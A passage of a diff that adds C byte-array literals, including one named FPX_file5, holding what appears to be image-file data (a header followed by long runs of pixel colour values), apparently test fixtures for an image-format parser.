+"\x0a\x00\x00\x00\x58\x00\x00\x00\x0b\x00\x00\x00\x64\x00\x00\x00"
+"\x0c\x00\x00\x00\x70\x00\x00\x00\x0d\x00\x00\x00\x7c\x00\x00\x00"
+"\x0e\x00\x00\x00\x88\x00\x00\x00\x0f\x00\x00\x00\x90\x00\x00\x00"
+"\x10\x00\x00\x00\x98\x00\x00\x00\x11\x00\x00\x00\xa0\x00\x00\x00"
+"\x02\x00\x00\x00\xe4\x04\x00\x00\x40\x00\x00\x00\xa0\x33\xac\x3b"
+"\x79\x7f\xc7\x01\x40\x00\x00\x00\xa0\x33\xac\x3b\x79\x7f\xc7\x01"
+"\x40\x00\x00\x00\xa0\x33\xac\x3b\x79\x7f\xc7\x01\x40\x00\x00\x00"
+"\xa0\x33\xac\x3b\x79\x7f\xc7\x01\x03\x00\x00\x00\x00\x00\x00\x00"
+"\x03\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00"
+"\x47\x00\x00\x00\x70\x5c\x00\x00\xff\xff\xff\xff\x08\x00\x00\x00"
+"\x28\x00\x00\x00\x60\x00\x00\x00\x52\x00\x00\x00\x01\x00\x18\x00"
+"\x00\x00\x00\x00\x40\x5c\x00\x00\x6d\x0b\x00\x00\x6d\x0b\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\xe8\xeb\xef\xea\xeb\xed\xe8\xea"
+"\xec\xed\xee\xf0\xe8\xe9\xec\xeb\xec\xee\xf9\xf9\xfa\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xeb\xee\xf2\xf2\xf3\xf4\xec\xed"
+"\xee\xe9\xea\xec\xea\xec\xed\xec\xed\xef\xf5\xf6\xf6\xfb\xfb\xfb"
+"\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb"
+"\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb"
+"\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xff\xff\xff"
+"\xff\xff\xff\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb"
+"\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb"
+"\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb"
+"\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb"
+"\xfb\xfb\xfb\xfb\xfb\xff\xff\xff\xff\xff\xff\xfb\xfb\xfb\xfb\xfb"
+"\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb"
+"\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb"
+"\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb"
+"\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xff\xff\xff"
+"\xff\xff\xff\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb"
+"\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb"
+"\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb"
+"\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb\xfb"
+"\xfb\xfb\xfa\xfa\xfa\xff\xff\xff\xff\xff\xff\xf6\xf4\xf2\xe5\xe3"
+"\xe1\xdf\xde\xdc\xe0\xde\xdb\xdf\xde\xdd\xe0\xde\xdc\xe1\xdf\xdd"
+"\xe1\xe0\xdf\xe1\xdf\xdd\xe2\xe0\xdd\xe2\xe0\xdd\xe2\xe1\xdf\xe2"
+"\xe1\xdf\xe1\xdf\xdb\xe1\xe0\xdf\xe2\xe0\xde\xe1\xe0\xde\xe0\xdf"
+"\xde\xe1\xe0\xde\xe2\xe0\xdf\xe1\xdf\xdc\xe2\xdf\xdc\xdc\xdc\xdd"
+"\xdd\xda\xd6\xe2\xe0\xde\xe2\xe0\xdd\xe2\xe0\xde\xe2\xe0\xdf\xe0"
+"\xdf\xdd\xe1\xe0\xdf\xe1\xe0\xdf\xe0\xdf\xdd\xe0\xdf\xde\xe1\xe0"
+"\xdd\xe2\xe0\xdf\xe1\xe0\xde\xe1\xdf\xdc\xe1\xe0\xdf\xe1\xdf\xdd"
+"\xe1\xe0\xde\xe2\xe0\xdd\xe2\xe0\xde\xe2\xe0\xdf\xe1\xdf\xdd\xe2"
+"\xe1\xdf\xe2\xe0\xde\xdc\xd9\xd5\xdb\xda\xd9\xe1\xe0\xdd\xe2\xe0"
+"\xde\xe2\xe0\xdc\xe1\xdf\xdd\xe2\xe0\xdf\xe1\xdf\xdd\xe0\xdf\xdd"
+"\xe2\xe0\xdd\xe2\xe0\xdd\xe2\xe0\xdf\xe0\xde\xdc\xe1\xe0\xdf\xe2"
+"\xe1\xdf\xe1\xe0\xdd\xe1\xe0\xde\xe0\xdf\xde\xe0\xdf\xde\xe1\xe0"
+"\xde\xe1\xdf\xdd\xe1\xe0\xdf\xe1\xdf\xdd\xe1\xdf\xdc\xdc\xdc\xdd"
+"\xdb\xdb\xda\xe1\xe0\xde\xe2\xdf\xdc\xe2\xe1\xdf\xe1\xe0\xdf\xe1"
+"\xdf\xdd\xe1\xe0\xdf\xe2\xe0\xdd\xe2\xe0\xdd\xe1\xe0\xde\xe1\xdf"
+"\xdd\xe1\xe1\xdf\xe2\xdf\xdc\xe1\xe0\xdd\xe1\xe0\xde\xe1\xdf\xdd"
+"\xe0\xdf\xde\xe1\xdf\xdc\xe2\xe0\xde\xe2\xe0\xdf\xe1\xdf\xdd\xe2"
+"\xe0\xde\xdf\xdf\xde\xff\xff\xff\xff\xff\xff\xec\xeb\xea\xe5\xe8"
+"\xee\xe5\xe9\xf0\xe5\xe9\xf0\xe5\xe9\xf0\xe5\xe9\xf0\xe5\xe9\xf0"
+"\xe5\xe9\xf0\xe5\xe9\xf0\xe5\xe8\xf0\xe6\xe9\xf1\xe5\xe9\xf1\xe5"
+"\xe8\xf0\xe5\xe8\xf0\xe5\xe8\xf0\xe5\xe9\xf0\xe5\xe9\xf0\xe5\xe9"
+"\xf0\xe5\xe8\xf0\xe5\xe8\xf0\xe5\xe9\xf0\xe5\xe8\xf0\xe6\xe9\xf1"
+"\xe6\xe9\xf1\xe5\xe9\xf0\xe5\xe9\xf0\xe5\xe8\xf0\xe5\xe8\xf0\xe5"
+"\xe8\xf0\xe5\xe9\xf0\xe5\xe8\xf0\xe5\xe8\xf0\xe5\xe8\xf0\xe5\xe9"
+"\xf0\xe5\xe9\xf0\xe5\xe9\xf0\xe5\xe8\xf0\xe5\xe8\xf0\xe5\xe9\xf0"
+"\xe5\xe9\xf0\xe5\xe9\xf0\xe5\xe8\xf0\xe5\xe8\xf0\xe5\xe9\xf0\xe5"
+"\xe9\xf0\xe5\xe8\xf0\xe6\xe9\xf1\xe6\xe9\xf1\xe5\xe9\xf0\xe5\xe8"
+"\xf0\xe5\xe8\xf0\xe5\xe8\xf0\xe5\xe8\xf0\xe5\xe9\xf0\xe5\xe8\xf0"
+"\xe5\xe8\xf0\xe5\xe8\xf0\xe5\xe9\xf0\xe5\xe9\xf1\xe5\xe9\xf1\xe5"
+"\xe8\xf0\xe5\xe8\xf0\xe5\xe9\xf0\xe5\xe8\xf0\xe5\xe8\xf0\xe5\xe9"
+"\xf0\xe5\xe9\xf0\xe5\xe9\xf0\xe5\xe9\xf0\xe5\xe9\xf0\xe6\xe9\xf1"
+"\xe6\xe9\xf1\xe5\xe9\xf0\xe5\xe9\xf0\xe5\xe8\xf0\xe5\xe8\xf0\xe5"
+"\xe9\xf0\xe5\xe9\xf0\xe5\xe8\xf0\xe5\xe8\xf0\xe5\xe9\xf0\xe5\xe9"
+"\xf0\xe5\xe9\xf0\xe6\xe9\xf0\xe5\xe8\xf0\xe5\xe8\xf0\xe5\xe9\xf0"
+"\xe5\xe8\xf0\xe5\xe8\xf0\xe5\xe8\xf0\xe5\xe9\xf0\xe5\xe9\xf0\xe5"
+"\xe8\xf0\xd9\xd8\xd7\xff\xff\xff\xff\xff\xff\xed\xec\xec\xe5\xe8"
+"\xef\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1"
+"\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6"
+"\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9"
+"\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1"
+"\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6"
+"\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9"
+"\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1"
+"\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6"
+"\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9"
+"\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1"
+"\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6"
+"\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9"
+"\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1"
+"\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6"
+"\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9"
+"\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1"
+"\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6"
+"\xe9\xf1\xd9\xd6\xd2\xff\xff\xff\xff\xff\xff\xed\xec\xeb\xe5\xe8"
+"\xef\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1"
+"\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6"
+"\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9"
+"\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1"
+"\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6"
+"\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9"
+"\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1"
+"\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6"
+"\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9"
+"\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1"
+"\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6"
+"\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9"
+"\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1"
+"\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6"
+"\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9"
+"\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1"
+"\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6"
+"\xe9\xf1\xd8\xd7\xd6\xff\xff\xff\xff\xff\xff\xed\xec\xec\xe5\xe8"
+"\xef\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe8\xe8\xe8"
+"\xec\xeb\xeb\xec\xeb\xea\xec\xeb\xea\xed\xed\xee\xec\xea\xe9\xec"
+"\xeb\xeb\xed\xec\xec\xed\xec\xec\xed\xec\xec\xec\xea\xe9\xed\xec"
+"\xed\xed\xed\xee\xec\xeb\xea\xed\xec\xed\xec\xec\xec\xea\xe9\xe8"
+"\xea\xe7\xe4\xec\xea\xe9\xed\xed\xed\xec\xea\xe9\xec\xeb\xea\xed"
+"\xec\xec\xec\xeb\xeb\xec\xec\xec\xec\xeb\xea\xed\xec\xed\xed\xed"
+"\xee\xec\xeb\xeb\xed\xed\xef\xed\xec\xec\xed\xeb\xeb\xed\xec\xeb"
+"\xe6\xe9\xf0\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe8\xf0\xe8\xe8\xec\xeb"
+"\xe9\xe8\xec\xeb\xeb\xeb\xea\xea\xea\xe7\xe5\xec\xec\xed\xec\xea"
+"\xea\xed\xec\xed\xed\xec\xed\xec\xeb\xeb\xec\xec\xec\xec\xeb\xec"
+"\xec\xec\xec\xec\xeb\xeb\xeb\xea\xe9\xed\xec\xed\xeb\xe9\xe8\xec"
+"\xeb\xeb\xec\xec\xed\xec\xeb\xec\xec\xeb\xec\xec\xeb\xea\xed\xec"
+"\xee\xed\xec\xee\xec\xea\xe9\xec\xec\xed\xed\xec\xec\xeb\xe9\xe8"
+"\xe9\xe6\xe4\xeb\xea\xe9\xec\xec\xed\xeb\xe9\xe9\xec\xeb\xeb\xec"
+"\xec\xec\xec\xea\xea\xec\xec\xec\xec\xeb\xeb\xed\xec\xed\xed\xec"
+"\xee\xec\xeb\xea\xed\xec\xed\xec\xec\xed\xec\xeb\xec\xeb\xea\xea"
+"\xec\xeb\xeb\xed\xec\xee\xeb\xea\xea\xe5\xe6\xeb\xe6\xe9\xf1\xe6"
+"\xe9\xf1\xd9\xd7\xd5\xff\xff\xff\xff\xff\xff\xed\xeb\xea\xe5\xe8"
+"\xee\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xee\xeb\xe8"
+"\xfa\xf9\xf7\xfb\xfb\xf9\xfc\xfb\xf9\xfc\xfc\xfb\xfc\xfa\xf8\xfb"
+"\xfb\xfa\xfc\xfb\xfa\xfc\xfb\xfa\xfc\xfb\xfa\xfb\xfa\xf9\xfc\xfb"
+"\xfa\xfb\xfb\xfa\xfb\xfa\xf9\xfc\xfb\xfa\xfb\xfa\xfa\xfe\xfe\xfe"
+"\xfe\xfe\xfe\xfb\xfa\xf8\xf7\xf6\xf6\xf7\xf6\xf5\xfb\xfa\xf9\xfb"
+"\xfb\xfa\xfb\xfa\xf9\xfc\xfb\xfa\xfb\xfb\xfa\xfc\xfb\xfb\xfc\xfb"
+"\xfb\xfc\xfb\xf9\xfc\xfc\xfb\xfc\xfb\xfa\xfc\xfb\xfa\xfb\xfa\xf8"
+"\xe5\xe7\xeb\xe6\xe9\xf1\xe6\xe9\xf1\xe5\xe8\xee\xec\xe9\xe6\xf9"
+"\xf6\xf3\xfb\xfb\xf9\xff\xff\xff\xff\xff\xff\xfc\xfb\xfa\xfb\xfa"
+"\xf8\xfc\xfb\xfa\xfc\xfb\xfa\xfb\xfa\xf9\xfb\xfa\xf9\xfb\xfb\xf9"
+"\xfb\xfb\xfa\xfb\xfa\xf9\xfb\xfa\xf8\xfc\xfb\xf9\xfb\xf9\xf7\xfb"
+"\xfa\xf8\xfb\xfb\xfa\xfb\xfa\xf9\xfb\xfb\xf9\xfb\xfa\xf9\xfc\xfb"
+"\xfa\xfc\xfb\xfa\xfb\xfa\xf8\xfc\xfb\xfa\xfb\xfa\xf9\xfe\xfe\xfe"
+"\xfe\xfe\xfe\xfb\xfa\xf8\xfb\xfa\xf9\xfa\xf9\xf8\xfb\xfa\xf9\xfb"
+"\xfa\xf9\xfb\xfa\xf9\xfc\xfb\xfa\xfb\xfb\xf9\xfc\xfb\xfa\xfc\xfb"
+"\xfa\xfc\xfa\xf8\xfc\xfb\xfa\xfc\xfb\xfa\xfb\xfb\xfa\xfb\xfa\xf9"
+"\xfb\xfa\xf9\xfc\xfb\xfa\xfb\xfa\xf9\xe6\xe7\xea\xe6\xe9\xf1\xe6"
+"\xe9\xf1\xd9\xd7\xd5\xff\xff\xff\xff\xff\xff\xed\xed\xed\xe5\xe8"
+"\xef\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xf0\xee\xed"
+"\xfd\xfd\xfc\xfb\xfb\xfb\xf2\xf2\xf2\xf9\xf9\xf9\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xf5\xf6\xf6\xe9\xea\xea\xec\xec"
+"\xed\xdb\xdc\xdb\xdf\xe0\xe0\xea\xeb\xeb\xdb\xdb\xdb\xf1\xf1\xf1"
+"\xfc\xfc\xfc\xd8\xd8\xd9\xcd\xce\xcf\xd0\xd1\xd2\xdb\xdc\xdc\xe0"
+"\xe1\xe1\xe5\xe5\xe5\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfb\xfb"
+"\xfb\xf5\xf5\xf5\xf1\xf1\xf1\xff\xff\xff\xff\xff\xff\xfe\xfe\xfd"
+"\xe6\xe8\xed\xe6\xe9\xf1\xe6\xe9\xf1\xe5\xe8\xef\xee\xed\xed\xfc"
+"\xfc\xfb\xff\xff\xff\xff\xff\xff\xfc\xfc\xfc\xf6\xf6\xf6\xfe\xfe"
+"\xfe\xff\xff\xff\xff\xff\xff\xfa\xfa\xfb\xe6\xe6\xe7\xe8\xe8\xe9"
+"\xe5\xe5\xe6\xdc\xdc\xdd\xe5\xe6\xe6\xdf\xdf\xdf\xdc\xdc\xdc\xdb"
+"\xdb\xdc\xe5\xe6\xe6\xfa\xfa\xfa\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe1\xe1\xe1\xea\xea\xea"
+"\xd9\xda\xd9\xe4\xe5\xe5\xe4\xe4\xe4\xdb\xdb\xdb\xe3\xe3\xe3\xde"
+"\xde\xde\xf6\xf6\xf6\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xf2\xf2\xf2\xf3\xf3\xf3\xfa\xfa\xfa"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe7\xe8\xeb\xe6\xe9\xf1\xe6"
+"\xe9\xf1\xd9\xd7\xd5\xff\xff\xff\xff\xff\xff\xef\xf1\xf6\xe6\xe9"
+"\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xf4\xf5\xf6"
+"\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xf3\xea\xde\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xf7\xf8\xf8\xd2\xd3\xd3\xac\xad"
+"\xad\xd6\xd6\xd6\xe1\xe1\xe2\xd2\xd2\xd2\xd4\xd5\xd6\xed\xed\xed"
+"\xfa\xfa\xfa\xd1\xd1\xd1\xb4\xb5\xb4\xd3\xd3\xd3\xd7\xd7\xd7\xdf"
+"\xe0\xe0\xdd\xde\xdd\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xf0\xf2\xf6\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xcf\xcf\xcf\xde\xde\xde"
+"\xb3\xb3\xb2\xd5\xd6\xd5\xcf\xcf\xcf\xd1\xd1\xd1\xcf\xcf\xcf\xee"
+"\xef\xee\xd6\xd6\xd6\xf5\xf6\xf6\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xdc\xdc\xdc\xe7\xe7\xe7"
+"\xe5\xe5\xe6\x98\x9a\x9b\xdc\xdc\xdc\xee\xef\xee\xdf\xdf\xdf\xd5"
+"\xd5\xd6\xf9\xf9\xf9\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe4\xe7\xeb\xe6\xe9\xf1\xe6"
+"\xe9\xf1\xd6\xcd\xc1\xff\xff\xff\xff\xff\xff\xe5\xdc\xd1\xe6\xe9"
+"\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xec\xe4\xdc"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfb\xf8\xf4\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfb\xfc"
+"\xfc\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xfb\xfb\xfb\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xe5\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xdd\xd0\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xf8\xf8\xf8\xff\xff\xff"
+"\xfa\xfb\xfc\xff\xff\xff\xfc\xfc\xfc\xfb\xfb\xfb\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+;
+
+unsigned char FPX_file5[] = 
+
+"\xff\xff\xff\xf9\xf9\xf9\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe6\xe9\xf1\xe6\xe9\xf1\xe6"
+"\xe9\xf1\xdb\xdd\xe1\xff\xff\xff\xff\xff\xff\xee\xec\xec\xe5\xe8"
+"\xef\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xf1\xf0\xef"
+"\xfd\xfd\xfc\xff\xff\xff\xff\xff\xff\xfb\xf7\xf3\xf2\xe7\xd9\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfd\xfd"
+"\xfb\xfc\xfa\xf7\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xfe\xfe\xfd"
+"\xe6\xe8\xec\xe6\xe9\xf1\xe6\xe9\xf1\xe5\xe8\xee\xed\xec\xeb\xfc"
+"\xfb\xfa\xff\xff\xff\xff\xff\xff\xff\xff\xff\xf7\xf1\xe8\xf5\xed"
+"\xe2\xfd\xfc\xfb\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xfa\xf6\xf0\xfd\xfb\xf9\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xfd\xfc\xfa\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xfe\xfe\xfe\xfc\xfb\xf9\xfe\xfe\xfe\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe7\xe7\xe9\xe6\xe9\xf1\xe6"
+"\xe9\xf1\xd8\xd5\xd3\xff\xff\xff\xff\xff\xff\xed\xec\xec\xe5\xe8"
+"\xef\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xf0\xee\xee"
+"\xfd\xfd\xfc\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfc\xfa\xf8\xfc"
+"\xfb\xf9\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xee\xdf\xca"
+"\xe5\xcb\xa8\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfa\xf6"
+"\xf1\xfb\xf8\xf5\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfd\xfd"
+"\xe5\xe7\xec\xe6\xe9\xf1\xe6\xe9\xf1\xe5\xe8\xef\xee\xed\xed\xfc"
+"\xfc\xfb\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xfc\xf9"
+"\xf6\xf9\xf5\xf0\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xea\xd8\xbf\xe7\xd2\xb6\xfd\xfc\xfa\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xec\xdb\xc5\xfe\xfe\xfd\xff\xff\xff\xff\xff\xff\xff"
